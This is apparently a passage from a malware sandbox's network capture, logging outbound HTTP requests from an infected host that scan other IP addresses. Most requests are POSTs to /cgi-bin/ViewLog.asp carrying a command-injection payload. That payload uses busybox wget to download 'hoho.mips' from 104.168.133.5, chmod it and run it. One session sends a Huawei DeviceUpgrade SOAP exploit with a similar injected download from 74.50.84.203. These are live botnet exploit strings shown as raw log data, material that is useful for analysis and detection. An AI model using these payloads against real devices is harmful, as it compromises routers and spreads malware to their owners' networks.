3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              155192.168.2.144258631.136.224.388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.098382950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:42.663415909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.783356905 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.183253050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:50.791063070 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.750695944 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.669941902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:54.532407045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              156192.168.2.145367094.121.186.2418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.141571999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              157192.168.2.144696294.120.248.1278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.150105000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              158192.168.2.144692095.86.116.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.154304981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              159192.168.2.145262295.214.179.828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.211693048 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.719361067 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:45.511292934 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:49.255156994 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.422935009 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:10.758238077 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:40.196991920 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              160192.168.2.144714241.250.5.1337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.846566916 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              161192.168.2.146074231.136.59.1848080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:45.727735043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.743155003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:54.886928082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:06.918416977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:32.005341053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
